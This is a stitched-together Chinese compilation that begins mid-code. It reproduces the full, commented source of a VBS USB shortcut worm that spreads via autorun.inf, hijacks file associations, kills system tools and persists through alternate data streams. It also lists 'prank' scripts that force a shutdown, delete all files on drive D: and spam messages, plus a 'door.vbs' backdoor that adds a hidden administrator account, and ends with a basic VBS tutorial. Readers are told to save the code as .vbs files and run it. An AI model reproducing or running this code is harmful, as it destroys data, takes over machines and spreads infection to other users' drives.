"\dllcache\regedit.exe /s" & Space(3) & fs.GetSpecialFolder(1) & "\vbs.reg")end ifelseif fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Thenr.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\vbs.reg")elser.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & s.DriveLetter & ":\vbs.reg")end ifend ifppp=a6&Space(2)&chr(34) & a7 & chr(34)&"," &chr(34)&fs.GetSpecialFolder(1) & "\shell32.dll,1"&chr(34)Execute pppend ifppp=a6&Space(2)&chr(34) & a1 & "ShowSuperHidden" &chr(34)& "," & "0," & chr(34)&"REG_DWORD"&chr(34)Execute pppppp=a6&Space(2)&chr(34) & a1 & "HideFileExt" &chr(34)& "," & "1," & chr(34)&"REG_DWORD"&chr(34)Execute pppppp=a6&Space(2)&chr(34) & a1 & "Hidden" &chr(34)& "," & "0," & chr(34)&"REG_DWORD"&chr(34)Execute pppppp=a6&Space(2)&chr(34) & a2 & "ScriptEngine\" &chr(34)& "," & chr(34)&"VBScript" & chr(34)Execute pppppp=a6&Space(2)&chr(34) & a2 & "ScriptHostEncode\" &chr(34)& "," & chr(34)&"{85131631-480C-11D2-B1F9-00C04F86C324}" & chr(34)Execute pppppp=a6&Space(1)&chr(34) & a2 & "Shell\Open\Command\" &chr(34)& "," & chr(34)&fs.GetSpecialFolder(1) &"\Wscript.exe" &Space(1)& chr(34) &chr(34) &"%1"&chr(34) & chr(34) &Space(1)& "%*" & chr(34) Execute pppppp=a6&Space(2)&chr(34) & a2 & "ShellEx\PropertySheetHandlers\WSHProps\" &chr(34)& "," & chr(34)&"{60254CA5-953B-11CF-8C96-00AA00B8708C}" & chr(34)Execute pppppp=a6&Space(2)&chr(34) & a3 & chr(34)&"," & "0," & chr(34)&"REG_DWORD"&chr(34)Execute pppppp=a6&Space(2)&chr(34) & a4 & chr(34)&"," & "0," & chr(34)&"REG_DWORD"&chr(34)Execute pppif fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Thenppp=a6&Space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "D:\System Volume Information" & "\USBDR" & "IVE.dll" & chr(34)Execute pppelseppp=a6&Space(2)&chr(34) & a5 &chr(34)& "," & chr(34)&fs.GetSpecialFolder(1)&"\USBDR" & "IVE.dll" & chr(34)Execute pppend ifif day(date())="27" then （27号报告错误）msgbox "⼩样！你的杀毐软件该升级了，磁盘已被格式化"End IfFunction scandoc(a) （定义⼦函数）On Error Resume Next （出错不报告）dim files,file,subfolder,folder_set folder_=fs.getfolder(a)set files=folder_.filesfor each file in files (for each。

U盘病毒--vbs快捷方式病毒源代码【分析↓】vbs快捷方式病毒删除方法注意：把以下的病毒代码复制到“记事本”后，在“另存为”操作时，名称为worm.vbs，“保存类型”为“所有文件”，“编码”为“ANSI”。

不然会提示错误信息，型如行：1字符：1错误：无效字符代码：800A0408源： microsoftvbscript 编译器错误On Error Resume NextDim Fso,WshShellSet Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")Set WshShell=CreateObject("wScRipT.SHelL"):Call Main()''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''''''''''''''''''''''''主函数从这里开始''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''Sub Main()On Error Resume NextDim Args, VirusLoad, VirusAssSet Args=WScript.ArgumentsVirusLoad=GetMainVirus(1)'"c:\windows\system32\smss.exe:881406080.vbs "或者"c:\windows\system32\881406080.vbs"VirusAss=GetMainVirus(0)'"c:\windows\explorer.exe:881406080.vbs"或者"c:\windows\881406080.vbs"ArgNum=0Do While ArgNum<Args.Count'将vbs脚本的参数用空格分开一起放在Param这个字符串里面Param=Param&" "&Args(ArgNum)ArgNum=ArgNum + 1LoopSubParam=LCase(Right(Param, 3))'从Param串的右边取长度为3的子串，并且全部变为小写放进SubParamSelect Case SubParam'开始判断参数最右面，相当于后缀部分Case "run"'貌似这种情况不存在,但是第一次会运行RunPath=Left(WScript.ScriptFullName, 2)'将72161642.vbs所在磁盘返回RunPath，比如D:Call Run(RunPath)'Run("F:")没有意义Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "txt", "log","ini" ,"inf"'如果是这些表明用户打开了文本文件RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&ParamCall Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "bat", "cmd"'让批处理显示 you jump, i jump!RunPath="CMD /c echo you jump i jump!&pause"Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "reg"RunPath="regedit.exe "&""""&Trim(Param)&""""'删除路径首尾空格Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "chm"RunPath="hh.exe "&""""&Trim(Param)&""""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "hlp"RunPath="winhlp32.exe "&""""&Trim(Param)&""""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "dir"RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&""""'除去dir三个字母Call Run(RunPath)'打开文件夹Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "oie"RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "omc"'打开我的电脑RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case "emc"'劫持Win+ERunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath)Call InvadeSystem(VirusLoad,VirusAss)Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)Case ElseIf PreDblInstance=True ThenWScript.QuitEnd IfTimeout = Datediff("ww", GetInfectedDate, Date) - 12'12周也就是说感染了3个月了If Timeout>0 And Month(Date) = Day(Date) ThenCall VirusAlert()Call MakeJoke(CInt(Month(Date)))'如果是5月5号那么就弹出5次光驱End IfCall MonitorSystem()End SelectEnd Sub''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''''''''''''''''''''''''''''''''''''''主函数至此结束''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''Sub MonitorSystem()'结束taskmgr.exe、regedit.exe、msconfig.exe、cmd.exe On Error Resume NextDim ProcessNames, ExeFullNamesProcessNames=Array("cmd.exe","","regedit.exe","regedit.scr","r egedit.pif","","msconfig.exe")'ProcessNames相当于数组首地址VBSFullNames=Array(GetMainVirus(1))DoCall KillProcess(ProcessNames)CallInvadeSystem(GetMainVirus(1),GetMainVirus(0))'1:smss.exe:72161642.vbs CallKeepProcess(VBSFullNames) '0:explorer.exe:72161642.vbs'上面这句用来保持进程活跃WScript.Sleep 3000LoopEnd SubSub InvadeSystem(VirusLoadPath,VirusAssPath)On Error Resume NextDim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, VersionLoad_Value=""""&VirusLoadPath&""""'smss.exe的病毒流File_Value="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" %1 %* "IE_Value="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" OIE "MyCpt_Value1="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" OMC "MyCpt_Value2="%SystemRoot%\System32\WScript.exe"&""""&VirusAssPath&""""&" EMC "HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Load"HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Ver"HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Date"VirusCode=GetCode(WScript.ScriptFullName)Version=1HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"For Each Drive In Fso.Drives'分别建立各个目录的病毒名字If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) ThenDiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)Call InfectRoot(Drive.DriveLetter,DiskVirusName)End IfIf FSO.FileExists(VirusAssPath)=False OrFSO.FileExists(VirusLoadPath)=False OrFSO.FileExists(HostFilePath)=False Or GetVersion()< Version ThenIf GetFileSystemType(GetSystemDrive())="NTFS" Then'NTFS格式Call CreateFile(VirusCode,VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)'这一步创建了流文件Call CopyFile(HostSourcePath,HostFilePath)'这一步将wscript.exe从system32复制到system目录并改名svchost.exeCall SetHiddenAttr(HostFilePath)Else'FAT32格式Call CreateFile(VirusCode, VirusAssPath)Call SetHiddenAttr(VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)Call SetHiddenAttr(VirusLoadPath)Call CopyFile(HostSourcePath, HostFilePath)Call SetHiddenAttr(HostFilePath)End IfEnd IfIfReadReg(HCULoad)<>Load_Value Then'改写注册表启动项，smss.exe的流Call WriteReg (HCULoad, Load_Value, "")End IfIfGetVersion() < Version Then'改写版本信息为1Call WriteReg (HCUVer, Version, "")End IfIfGetInfectedDate() = "" ThenCall WriteReg (HCUDate, Date, "")'记录感染时间End If'以下更改许多文件关联,病毒的通用感染方式IfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\comma nd\")<>File_Value ThenCall SetTxtFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\comma nd\")<>File_Value ThenCall SetIniFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\comma nd\")<>File_Value ThenCall SetInfFileAss(VirusAssPath)End IfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\comma nd\")<>File_Value ThenCall SetBatFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\comma nd\")<>File_Value ThenCall SetCmdFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\comma nd\")<>File_Value ThenCall SetRegFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\comm and\")<>File_Value ThenCall SetchmFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\comma nd\")<>File_Value ThenCall SethlpFileAss(VirusAssPath)End IfIfReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.ex e\shell\open\command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309 D}\shell\OpenHomePage\Command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309 D}\shell\open\command\")<>MyCpt_Value1 ThenCall SetMyComputerAss(VirusAssPath)End IfIfReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309 D}\shell\explore\command\")<>MyCpt_Value2 ThenCall SetMyComputerAss(VirusAssPath)End IfCall RegSet()End SubSub CopyFile(source, pathf)On Error Resume NextIf FSO.FileExists(pathf) ThenFSO.DeleteFilepathf , TrueEnd IfFSO.CopyFile source, pathfEnd SubSub CreateFile(code, pathf)On Error Resume NextDim FileTextIf FSO.FileExists(pathf) ThenSet FileText=FSO.OpenTextFile(pathf, 2, False)FileText.Write codeFileText.CloseElseSet FileText=FSO.OpenTextFile(pathf, 2, True)FileText.Write codeFileText.CloseEnd IfEnd SubSub RegSet()'文件夹选项的注册表设置On Error Resume NextDim RegPath1 , RegPath2, RegPath3, RegPath4RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio n\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"'隐藏选项失效RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio n\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"'隐藏选项失效RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\Explorer\NoDriveTypeAutoRun"RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"Call WriteReg (RegPath1, 3, "REG_DWORD")Call WriteReg (RegPath2, 2, "REG_DWORD")Call WriteReg (RegPath3, 0, "REG_DWORD")'开启所有自动播放Call DeleteReg (RegPath4)'隐藏快捷方式小箭头End SubSub KillProcess(ProcessNames)'杀掉进程On Error Resume NextSet WMIService=GetObject("winmgmts:\\.\root\cimv2")For Each ProcessName in ProcessNamesSet ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ")For Each Process in ProcessListIntReturn=1'Process.terminateIf intReturn<>0 ThenWshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, FalseEnd IfNextNextEnd SubSub KillImmunity(D)'删掉autorun.inf免疫目录On Error Resume NextImmunityFolder=D&":\Autorun.inf"If Fso.FolderExists(ImmunityFolder) ThenWshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True'提权WshSHell.Run ("CMD /C RD /S /Q "&ImmunityFolder), vbHide, True'rd命令删除，配合 /s /q 选项，很轻松End IfEnd SubSub KeepProcess(VBSFullNames)'保持脚本进程持续运行，少于2个创建新进程On Error Resume NextFor Each VBSFullName in VBSFullNamesIf VBSProcessCount(VBSFullName) < 2 thenRun("%SystemRoot%\system\svchost.exe "&VBSFullName)End IfNextEnd SubFunction GetSystemDrive()'获取系统盘的盘符，比如c:GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)End FunctionFunction GetFileSystemType(Drive)'获取对应驱动器的文件系统格式Set d=FSO.GetDrive(Drive)GetFileSystemType=d.FileSystemEnd FunctionFunction ReadReg(strkey)'读取注册表，搜索strkey，返回所在路径Dim tmpsSet tmps=CreateObject("WScript.Shell")ReadReg=tmps.RegRead(strkey)Set tmps=NothingEnd FunctionSub WriteReg(strkey, Value, vtype)'写注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")If vtype="" Thentmps.RegWritestrkey, ValueElsetmps.RegWritestrkey, Value, vtypeEnd IfSet tmps=NothingEnd SubSub DeleteReg(strkey)'删除注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")tmps.RegDeletestrkeySet tmps=NothingEnd SubSub SetHiddenAttr(path)'6=2+4,分别是隐藏、系统属性On Error Resume NextDim vfSet vf=FSO.GetFile(path)Set vf=FSO.GetFolder(path)vf.Attributes=6End SubSub Run(ExeFullName)'执行ExeFullName指定的文件On Error Resume NextDim WshShellSet WshShell=WScript.CreateObject("WScript.Shell") WshShell.RunExeFullNameSet WshShell=NothingEnd SubSub InfectRoot(D,VirusName)'感染根目录On Error Resume NextDim VBSCodeVBSCode=GetCode(WScript.ScriptFullName)VBSPath=D&":\"&VirusNameIf FSO.FileExists(VBSPath)=False ThenCall CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)End IfSet Folder=Fso.GetFolder(D&":\")'隐藏根目录下的所有子目录Set SubFolders=Folder.SubfoldersFor Each SubFolder In SubFoldersSetHiddenAttr(SubFolder.Path)LnkPath=D&":\"&&".lnk"'创建对应的快捷方式TargetPath=D&":\"&VirusNameArgs=""""&D&":\"&& "\Dir"""If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <>TargetPath ThenIf Fso.FileExists(LnkPath)=True ThenFSO.DeleteFileLnkPath, TrueEnd IfCall CreateShortcut(LnkPath,TargetPath,Args)End IfNextEnd SubSub CreateShortcut(LnkPath,TargetPath,Args)'上一步失败了调用这个函数创建快捷方式Set Shortcut=WshShell.CreateShortcut(LnkPath)with Shortcut.TargetPath=TargetPath.Arguments=Args.WindowStyle=4.IconLocation="%SystemRoot%\System32\Shell32.dll, 3".Saveend withEnd SubSub CreateAutoRun(D,VirusName)'创建autorun.inf文件On Error Resume NextDim InfPath, VBSPath, VBSCodeInfPath=D&":\AutoRun.inf"VBSPath=D&":\"&VirusNameVBSCode=GetCode(WScript.ScriptFullName)If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)StrInf="[AutoRun]"&VBCRLF&"Shellexecute=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open=打开(&O)"&VBCRLF&"shell\open\command=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open\Default=1"&VBCRLF&"shell\explore=资源管理器(&X)"&VBCRLF&"shell\explore\command=WScript.exe "&VirusName&" ""AutoRun"""Call KillImmunity(D)Call CreateFile(StrInf, InfPath)Call SetHiddenAttr(InfPath)End IfEnd SubSub SetTxtFileAss(sFilePath)'改变txt格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetIniFileAss(sFilePath)'改变ini格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetInfFileAss(sFilePath)'改变inf格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetBatFileAss(sFilePath)'改变bat格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %*"CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetCmdFileAss(sFilePath)'改变cmd格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SethlpFileAss(sFilePath)'改变hlp格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetRegFileAss(sFilePath)'改变reg格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\comm and\", Value, "REG_EXPAND_SZ")End SubSub SetchmFileAss(sFilePath)'改变chm格式文件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\com mand\", Value, "REG_EXPAND_SZ")End SubSubSetIEAss(sFilePath)'篡改IE启动设置On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OIE " CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.e xe\shell\open\command\", Value, "REG_EXPAND_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B3030 9D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")End SubSub SetMyComputerAss(sFilePath)'改变我的电脑的打开关联，包括Win+EOn Error Resume NextDim Value1,Value2Value1="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OMC "Value2="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" EMC "CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\", "", "REG_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\open\command\", Value1, "REG_EXPAND_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")End SubFunction GetSerialNumber(Drv)'获取驱动器序列号的绝对值On Error Resume NextSet d=fso.GetDrive(Drv)GetSerialNumber=d.SerialNumber'返回十进制序列号，用于唯一标识一个磁盘卷GetSerialNumber=Replace(GetSerialNumber,"-","")'去掉负号End FunctionFunction GetMainVirus(N)'根据N的值获取不同的字符串On Error Resume NextMainVirusName=GetSerialNumber(GetSystemDrive())&".vbs"'以驱动器的序列号绝对值为vbs病毒的名字If GetFileSystemType(GetSystemDrive())="NTFS" Then'系统盘是NTFS分区If N=1 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\smss.exe:"&MainVirusName'返回"c:\windows\system32\smss.exe:72161642.vbs"End IfIf N=0 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\explorer.exe:"&MainVirusName'返回"c:\windows\explorer.exe:72161642.vbs"End IfElse'系统盘是FAT32分区GetMainVirus=Fso.GetSpecialFolder(N)&"\"&MainVirusName'返回"c:\windows\72161642.vbs"或者"c:\windows\system32\72161642.vbs"End IfEnd FunctionFunction VBSProcessCount(VBSPath)'返回指定路径vbs脚本的运行个数On Error Resume NextDim WMIService, ProcessList, ProcessVBSProcessCount=0Set WMIService=GetObject("winmgmts:\\.\root\cimv2")Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'") For Each Process in ProcessListIf InStr(mandLine, VBSPath)>0 ThenVBSProcessCount=VBSProcessCount+1End IfNextEnd FunctionFunction PreDblInstance()'用来计数wscript进程的个数，如果大于等于3个那么返回TrueOn Error Resume NextPreDblInstance=FalseIf VBSProcessCount(WScript.ScriptFullName)>= 3 ThenPreDblInstance=TrueEnd IfEnd FunctionFunction GetTargetPath(LnkPath)'获取快捷方式的vbs脚本地址On Error Resume NextDim ShortcutSet Shortcut=WshShell.CreateShortcut(LnkPath)GetTargetPath=Shortcut.TargetPathEnd FunctionFunction GetCode(FullPath)'获取文件的所有代码On Error Resume NextDim FileTextSet FileText=FSO.OpenTextFile(FullPath, 1)GetCode=FileText.ReadAllFileText.CloseEnd FunctionFunction GetVersion()'获取windows版本Dim VerInfoVerInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Ver"If ReadReg(VerInfo)="" ThenGetVersion=0ElseGetVersion=CInt(ReadReg(VerInfo))End IfEnd FunctionSub VirusAlert()'创建一个BFAlert.hta，然后打开该网页，黑黑的，什么都没有，吓人的On Error Resume NextDim HtaPath,HtaCodeHtaPath=Fso.GetSpecialFolder(1)&"\BFAlert.hta"HtaCode="<HTML><HEAD><TITLE>暴风一号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize""border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no""selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<fontstyle=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR >"&VBCRLF&"<font style=""font-size:200%;font-family:黑体;color=red"">暴风一号</font>"&VBCRLF&"</DIV></BODY></HTML>"If FSO.FileExists(HtaPath)=False ThenCall CreateFile(HtaCode, HtaPath)Call SetHiddenAttr(HtaPath)End IfCall Run(HtaPath)End SubFunction GetInfectedDate()'获取感染日期On Error Resume NextDim DateInfoDateInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"If ReadReg(DateInfo)="" ThenGetInfectedDate=""ElseGetInfectedDate=CDate(ReadReg(DateInfo))End IfEnd FunctionSub MakeJoke(Times)'恶搞，弹出光驱On Error Resume NextDim WMP, colCDROMsSet WMP = CreateObject( "WMPlayer.OCX" )Set colCDROMs = WMP.cdromCollectionIf colCDROMs.Count>0 ThenFor i=1 to TimescolCDROMs.Item(0).eject()WScript.Sleep 3000colCDROMs.Item(0).eject()NextEnd IfSet WMP = NothingEnd Sub。

整⼈病毒vbs⼤全！新建⼀个记事本把代码复制进去重名名为vbs格式的就可以了解除这个vbs脚本的办法就简单了只要关掉任务管理器⾥Wscript.exe这个进程就好了1、你打开好友的聊天对话框,然后记下在你QQ⾥好友的昵称,把下⾯代码⾥的xx替换⼀下,就可以⾃定义发送QQ信息到好友的次数(代码⾥的数字10改⼀下即可).xx.vbs=>—————————————————————————代码如下：On Error Resume NextDim wsh,yeset wsh=createobject(“wscript.shell”)for i=1 to 10wscript.sleep 700wsh.AppActivate(“与 xx 聊天中“)wsh.sendKeys “^v”wsh.sendKeys iwsh.sendKeys “%s”nextwscript.quit—————————————————————————2、我就⽤这个程序放在学校图书馆查询书刊的机器上，好多⼈都那它没办法，哈哈—————————————————————————代码如下：domsgbox “You are foolish!”loop—————————————————————————3、直接关机—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “shutdown -f -s -t 00”,0 ,true—————————————————————————4、删除D:\所有⽂件—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true —————————————————————————5、不断弹出窗⼝—————————————————————————代码如下：while(1)msgbox “哈哈你被耍了！“loop—————————————————————————6、不断按下alt+f4 （开什么都关闭……）病毒太强必须关机才⾏！—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)while(1)WSHshell.SendKeys “%{F4}”Wend—————————————————————————7、按500次回车(以下代码在运⾏者的电脑上显⽰500个对话框。

⿊客必须要知道的⼏个vbs⽂件代码1. door.vbs'***************'door.vbs by ⿊嘿⿊'***************dim wsh,FA,FSOset fso=CreateObject("Scripting.FileSystemObject")Set FA= FSO.GetFile(WScript.scriptFullName)FA.Attributes =34set wsh=CreateObject("WScript.Shell")wsh.run "net user IUSE_SERVER /add",0,truewsh.run "net localgroup administrators IUSE_SERVER /add" ,0,truewsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD" wsh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun",""&FA&""wsh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun",""&FA&""功能：添加不死帐号（随cmd启动⽽启动），在win下彻底隐藏。

VBS脚本病毒教程VBS教程（文本版）就像多数计算机教程一样，我们从"Hello World！"程序开始我们的练习。

什么？不知道是什么意思？就是说大部分的计算机程序设计教程开篇入门都是编写一个小程序，执行这个程序的结果就是在计算机的屏幕上或者dos窗口中显示一行文字：Hello World！好了，我们开始吧。

打开你的"记事本"程序，在编辑窗口填写：msgbox "Hello World!"然后用鼠标单击"文件"菜单，单击"保存"，把"保存在"一栏设为桌面，在"文件名"一栏中填写kk.vbs，单击"保存"就可以了。

然后最小化"记事本"窗口，在桌面上寻找你刚刚保存的kk.vbs，然后双击。

看到弹出的对话框了没有，单击"确定"，对话框消失了。

说明之一：上面的操作中，保存位置放在桌面，仅仅是为了执行方便，你保存到其他的地方完全没有问题，只要你知道你保存在什么地方就可以了，什么？是废话，自己保存的当然知道保存在那里了。

不，自己保存的文件自己找不到的人我见的多了去了。

文件名你可以随意填写，不一定非要写kk，只要符合Windows的文件命名规则就可以了，但是扩展名必须是vbs，什么?不知道什么是扩展名？就是文件名中"."后的那部分，简单说，就是vbs脚本文件命名时必须是：xxx.vbs，其中xxx你随意。

说明之二：在记事本编辑窗口中写的这行是什么意思？Msgbox是VBS内建的函数，每一个函数都可以完成一定的功能，你只需要按照语法要求，在函数的相应部分填写相应的内容就可以了，这部分内容我们称为参数，当然函数执行的结果我们称为返回值，一个函数可以有返回值也可以没有，可以有参数也可以没有。

你不用了解函数是怎么运作的，只要了解这个函数能干什么就行了。

前段时间看到大家对这种整人的代码兴趣还挺浓厚的，我最近就收集了一些和大家分享。

